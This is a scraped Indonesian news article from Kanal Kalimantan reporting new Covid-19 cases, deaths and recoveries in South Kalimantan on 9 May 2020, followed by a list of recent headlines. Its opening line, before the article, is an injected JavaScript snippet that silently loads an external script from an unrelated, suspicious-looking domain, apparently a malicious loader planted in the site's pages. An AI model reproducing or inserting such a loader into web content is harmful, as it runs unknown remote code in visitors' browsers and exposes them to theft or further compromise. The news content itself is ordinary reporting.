(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

9 Kasus Baru Covid-19 di Kalsel, 5 Kasus Diantaranya Hasil Tracking!


KANALKALIMANTAN.COM, BANJARBARU – Jumlah kasus terkonfirmasi positif Covid-19 di Kalimantan Selatan kembali mengalami lonjakan. Data terbaru dari Tim Gugus Tugas Percepatan Penanganan (P2) Covid-19 Kalimantan Selatan mencatat, kasus positif Covid-19 pada Sabtu (9/5/2020) sore sebanyak 255 kasus, atau ada peningkatan sebanyak 9 kasus.

“Terdiri dari 3 kasus sebelumnya yang merupakan PDP (pasien dalam pengawasan) di RSUD Moch. Ansari Saleh Banjarmasin yang berasal dari Banjarmasin,” kata Juru Bicara Tim Gugus Tugas P2 Covid-19 Kalsel Muhamad Muslim di Banjarbaru, Sabtu (9/5/2020) sore.

Selanjutnya, 5 kasus lainnya tracking yang dilakukan, yang terdiri dari masing-masing satu kasus dari Kota Banjarmasin dan Kabupaten Barito Kuala, dan 3 kasus dari Kabupaten Tanah Bumbu.

Tambahan kasus baru sendiri, terdiri dari kode KS Covid #248 yaitu seorang laki-laki berusia 61 tahun, KS Covid #249 yaitu seorang perempuan berusia 41 tahun, dan KS Covid #250 yaitu seorang laki-laki berusia 34 tahun. Ketiganya berasal dari Kota Banjarmasin yang menjalani perawatan di RSUD Moch. Ansari Saleh Banjarmasin.

Kemudian, kasus positif Covid-19 lainnya yang menjalani karantina khusus, terdiri dari KS Covid #252 yaitu seorang perempuan berusia 36 tahun dari Kabupaten Barito Kuala. Serta KS Covid #251 yaitu seorang perempuan berusia 56 tahun asal Kota Banjarmasin.

Selanjutnya, KS Covid #253 yaitu seorang perempuan 21 tahun, KS Covid #255 seorang laki-laki berusia 55 tahun dan KS Covid #254 yaitu seorang perempuan berusia 65 tahun, yang ketiganya berasal dari Kabupaten Tanah Bumbu.

Saat ini, dari 255 kasus positif Covid-19, 196 kasus diantaranya menjalani perawatan atau karantina khusus. Di mana, dari jumlah tersebut, 45 kasus menjalani perawatan di beberapa rumah sakit rujukan yang ditetapkan oleh pemerintah maupun rumah sakit di beberapa kabupaten dan kota di Kalsel.

“Selebihnya, 149 kasus dikarantina secara khusus atau isolasi mandiri. Baik yang dilakukan di provinsi (Gedung Ambulung Banjarbaru) maupun di kabupaten dan kota, terutama tempat yang saat ini digunakan di rumah sakit lama di Tabalong dan Tanah Laut,” jelas Muslim.

Di samping itu, Muslim mengakui ada PDP meninggal dunia saat menjalani perawatan di RSUD Moch. Ansari Saleh Banjarmasin pada Senin (4/5/2020) lalu dan terkonfirmasi positif Covid-19. Yaitu KS Covid #247 atau MAS-28, seorang laki-laki berusia 55 tahun asal Kota Banjarmasin.

“Kemudian yang meninggal pada Jumat (8/5/2020) pukul 18:00 WITA kemarin yaitu KS Covid #233 atau Ulin-93 yaitu wanita berusia 51 tahun dari Banjarmasin dan hasil laboratoriumnya telah terkonfirmasi positif Covid-19,” ungkap Muslim.

Sehingga, dengan adanya satu kasus PDP positif Covid-19 serta satu kasus Covid-19 yang meninggal dunia, jumlah kasus kematian akibat Covid-19 tercatat sebanyak 20 kasus. Sedangkan kasus sembuh dari Covid-19 masih tercatat sebanyak 39 kasus.

Sementara itu, jumlah orang dalam pemantauan (ODP) maupun pasien dalam pengawasan (PDP) di Kalsel fluktuatif. Jumlah ODP sendiri kembali merangkak menjadi 1.013 orang, atau ada peningkatan sebanyak 33 orang. Sementara itu, jumlah PDP tercatat sebanyak 51 pasien, atau berkurang sebanyak 4 pasien. (Kanalkalimantan.com/fikri)

 

Reporter : Fikri
Editor : Cell

 


Desy Arfianty

Recent Posts

Pj Bupati Kapuas Erlin Hardi ke Desa Tumbang Mangkutup

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersilaturahmi dengan masyarakat Desa Tumbang… Read More

55 menit ago

Satgas TMMD Beri Penyuluhan Pertanian dan Perikanan di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Setelah program non fisik sosialisasi PHBS (Perilaku Hidup bersih Sehat) dan masalah… Read More

60 menit ago

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

4 jam ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

5 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

7 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

9 jam ago

This website uses cookies.